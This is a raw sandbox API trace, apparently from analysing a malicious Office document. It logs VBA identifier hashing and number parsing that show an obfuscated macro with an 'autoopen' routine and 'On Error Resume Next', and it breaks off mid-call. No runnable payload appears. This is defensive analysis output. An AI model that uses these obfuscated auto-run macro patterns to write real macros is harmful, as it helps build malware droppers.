LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.908] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DXACocXG") returned 0x101b8f [0067.908] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.908] VarI4FromStr (in: strIn="828290318", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.908] VarI4FromStr (in: strIn="486446522", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.908] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.908] VarI4FromStr (in: strIn="749592584", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.908] VarI4FromStr (in: strIn="975877876", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.908] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.908] VarI4FromStr (in: strIn="161578604", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.908] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JXQXocA") returned 0x10eff1 [0067.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.908] VarI4FromStr (in: strIn="535186861", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.908] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FAABDA") returned 0x10cdc7 [0067.908] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.909] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.909] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.909] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iwoBAC") returned 0x10d8fa [0067.909] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TD_AAA") returned 0x10e59a [0067.909] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.909] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mUG4AA") returned 0x102977 [0067.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.909] VarI4FromStr (in: strIn="938363519", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.909] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fQ1AABZ") returned 0x10076b [0067.909] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NXA_AB") returned 0x103998 [0067.909] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QwQAXkB") returned 0x10e7d7 [0067.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.909] VarI4FromStr (in: strIn="342828356", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.909] VarI4FromStr (in: strIn="919611453", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.909] VarI4FromStr (in: strIn="443274476", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.909] VarI4FromStr (in: strIn="736189015", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.909] VarI4FromStr (in: strIn="294738590", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.910] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PAAkAAA") returned 0x10f135 [0067.910] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.910] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zUDAAc1") returned 0x10128e [0067.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.910] VarI4FromStr (in: strIn="274040071", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.910] VarI4FromStr (in: strIn="106501947", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.910] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.910] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mAUXAA_U") returned 0x1053cb [0067.910] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.910] VarI4FromStr (in: strIn="336636485", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.910] VarI4FromStr (in: strIn="408197342", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.910] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.910] VarI4FromStr (in: strIn="775496455", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.910] VarI4FromStr (in: strIn="152594311", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.910] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.910] VarI4FromStr (in: strIn="919701061", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.910] IMalloc:Realloc (This=0x7fefec05380, pv=0x6754f90, cb=0x900) returned 0xafd3b10 [0067.910] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bU1A4_XG") returned 0x109069 [0067.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.910] VarI4FromStr (in: strIn="830316902", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.910] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PXDAAA") returned 0x1017ae [0067.910] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.910] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.910] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D__4Cxx") returned 0x10018a [0067.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oQXUCABA") returned 0x105716 [0067.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jAQ4Ac") returned 0x1037f1 [0067.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.911] VarI4FromStr (in: strIn="979076092", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SUZCUCDQ") returned 0x102554 [0067.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YwAAUAw") returned 0x10a757 [0067.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XAAAZAo") returned 0x10ac90 [0067.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.911] VarI4FromStr (in: strIn="172715265", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.911] VarI4FromStr (in: strIn="278225338", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.911] VarI4FromStr (in: strIn="864269025", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.911] VarI4FromStr (in: strIn="843155566", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.911] VarI4FromStr (in: strIn="634735231", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JAw14ZAB") returned 0x10b4fe [0067.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QoAcDUB") returned 0x104c3d [0067.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.911] VarI4FromStr (in: strIn="402675956", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.911] VarI4FromStr (in: strIn="657538496", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FA_cxAQA") returned 0x1009c7 [0067.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.911] VarI4FromStr (in: strIn="658871843", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.911] VarI4FromStr (in: strIn="358577645", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.911] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.912] VarI4FromStr (in: strIn="965112409", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.912] VarI4FromStr (in: strIn="512988069", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.912] VarI4FromStr (in: strIn="415232958", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IAAAX4") returned 0x100f28 [0067.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.912] VarI4FromStr (in: strIn="340140911", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fcoDoxAc") returned 0x1035ba [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="autoopen") returned 0x102ad9 [0067.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2212, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.912] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf60cd0, cb=0x100) returned 0xaf54180 [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qDBcAU") returned 0x10479f [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YAA4AAA") returned 0x10659c [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.912] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uAAQA1") returned 0x1071ab [0067.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.912] VarI4FromStr (in: strIn="532182585", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.913] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nUcABc") returned 0x106f22 [0067.913] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dAU_DoAQ") returned 0x10f260 [0067.913] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CUAA1kk") returned 0x107518 [0067.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.913] VarI4FromStr (in: strIn="77009695", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.913] VarI4FromStr (in: strIn="523416467", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.913] VarI4FromStr (in: strIn="277626703", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.913] VarI4FromStr (in: strIn="513027317", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.913] VarI4FromStr (in: strIn="506873159", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.913] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zCCoA1") returned 0x10879e [0067.913] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.913] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZBwk4oAA") returned 0x106f59 [0067.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.913] VarI4FromStr (in: strIn="160487116", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.913] VarI4FromStr (in: strIn="987812296", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.913] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.913] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZAABkoA_") returned 0x10fc69 [0067.913] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.913] VarI4FromStr (in: strIn="445483930", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.913] VarI4FromStr (in: strIn="829906615", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.913] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.913] VarI4FromStr (in: strIn="360308648", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.913] VarI4FromStr (in: strIn="51689871", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.913] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.913] VarI4FromStr (in: strIn="990353704", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.913] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GADXoXX") returned 0x10c8d3 [0067.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.914] VarI4FromStr (in: strIn="920658423", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IQAAAkQD") returned 0x109ee8 [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MAQQkQAc") returned 0x1014e7 [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JABkACAU") returned 0x104fbc [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SxGZDCB") returned 0x10c369 [0067.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.914] VarI4FromStr (in: strIn="333673872", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MQAGB4A") returned 0x1081e5 [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zQ4GA4Bo") returned 0x105281 [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AGDBwAwA") returned 0x1003df [0067.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.914] VarI4FromStr (in: strIn="25863416", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.914] VarI4FromStr (in: strIn="461250745", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.914] VarI4FromStr (in: strIn="172870300", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.914] VarI4FromStr (in: strIn="939725423", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.914] VarI4FromStr (in: strIn="301574911", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kGUAQxG") returned 0x104876 [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aBADAAwD") returned 0x107596 [0067.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.914] VarI4FromStr (in: strIn="521524708", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.914] VarI4FromStr (in: strIn="645236429", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uUUwDBwB") returned 0x10664f [0067.914] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.914] VarI4FromStr (in: strIn="626873496", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.914] VarI4FromStr (in: strIn="60178739", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.915] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.915] VarI4FromStr (in: strIn="459605370", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.915] VarI4FromStr (in: strIn="388251718", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.915] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.915] VarI4FromStr (in: strIn="170784323", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.915] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XCQGAAAA") returned 0x10bb7a [0067.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.915] VarI4FromStr (in: strIn="382835040", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.915] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AkwDAG_Q") returned 0x10a98c [0067.915] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.915] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.915] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.915] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IAQDB_G") returned 0x10fb3e [0067.915] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KZwoAQ") returned 0x10fb40 [0067.915] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.915] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OAAA_A4X") returned 0x10a6f3 [0067.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.915] VarI4FromStr (in: strIn="965254846", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.915] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aA1UQGXo") returned 0x10fe52 [0067.915] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fBAQU4D") returned 0x10a4ce [0067.915] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="U1ABAx") returned 0x100302 [0067.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.915] VarI4FromStr (in: strIn="500504304", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.915] VarI4FromStr (in: strIn="702912179", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.915] VarI4FromStr (in: strIn="693724017", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.915] VarI4FromStr (in: strIn="543741387", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.915] VarI4FromStr (in: strIn="941922291", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zCD4ADA") returned 0x108033 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAZGAZx") returned 0x100d48 [0067.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.916] VarI4FromStr (in: strIn="66691615", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.916] VarI4FromStr (in: strIn="687056895", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hkAo4A") returned 0x10f170 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.916] VarI4FromStr (in: strIn="390447196", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.916] VarI4FromStr (in: strIn="290814704", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.916] VarI4FromStr (in: strIn="967044922", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.916] VarI4FromStr (in: strIn="499570034", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.916] VarI4FromStr (in: strIn="342638321", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.916] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="A4UUQG1") returned 0x109a54 [0067.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 